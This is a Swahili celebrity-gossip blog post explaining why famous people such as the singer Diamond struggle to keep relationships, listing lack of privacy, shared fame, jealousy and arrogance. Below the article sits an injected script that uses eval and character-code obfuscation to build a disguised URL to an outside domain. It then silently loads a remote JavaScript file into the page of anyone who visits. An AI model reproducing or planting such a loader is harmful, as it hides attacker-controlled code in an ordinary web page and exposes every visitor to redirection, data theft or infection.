Watu maarufu wamekuwa na matukio mengi sana yakushangaza ikiwemo pia mambo ya mahusiano au mapenzi ambayo mara nyingi hushangaza watu mbalimbali ikiwemo mashabiki wao mfano kwa sasa msanii Naseeb Abdul maarufu kama Diamond amekuwa na wanawake zaidi ya watano maarufu na hajafika popote wala kuoa na sasa inasemekana yupo na msanii wake Zuchu, je atamuoa?
Kiukweli watu wengi maarufu wakiwemo wasanii, wanamichezo, wanamitindo wamekuwa wakisumbuka sana na suala la mapenzi na mahusiano bapo wengi wao wamekuwa wakifeli sana hiyo idara ambapo mahusiano yao huvunjika mapema na kutofika mbali ambapo hii inapelekea wengi wao kutofikia ndoa na hata kuvunja ndoa mara kwa mara.
Sababu za wasanii kutodumu katika mahusiano
1: Kukosa Faragha ya Kutosha
Watu maarufu wengi hujulikana na watu wengi sana hali inayopelekea kukosa faragha na mambo yao kuongelewa kila mara au kujulikana kwa watu wengi hali inayofanya kuvunjika kwa mahusiano kwa kuwa wenza wao hushindwa vumilia hali.
2: Umaarufu kwa wenza wote
Inapotokea watu wote wawili katika mahusiano ni maarufu huwa ni sababu pia ys kuvunjika kwa mahusiano mapema kwa kuwa umaarufu wao huweza leta utofauti katika kazi na mengineyo hali inayopelekea kugombana na kuvunjwa kwa mahusiano na kuachana.
3: Wivu
Kutokana na umaarufu vishawishi na watu wanaohitaji mwenza huongezeka hali hii humtesa mwenza mwenye wivu hata kama mpenzi wake atakuwa ni mwenye wivu sana na hawezi kuucontrol kutokana na hali hiyo hupelekea mahusiano kuingia matatani na hata kuachana.
4: Matambo
Watu wengi maarufu huwa na matambo sana hasa wasanii hali inayopelekea kuwakwaza wapenzi wao na hata kuwadharau kutokana na hali hiyo wengi huishia kuachana na kupelekea kuachana mara kwa mara.
Hayo ni machache tu japo kuna sababu nyingi sana zinazopelekea watu maarufu kutodumu katika mahusiano na kuachana au kuvunja ndoa kila mara lakini suala hili huweza kuepukika endapo watakuwa na upendo wa kweli baina yao, heshima na uwazi kwakuwa wapo wanaodumu mfano Beyonce na Jayz, na wengineo wengi.
Ona Sababu za Mastaa Kuachwa na Wapenzi wao
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>
Recent Comments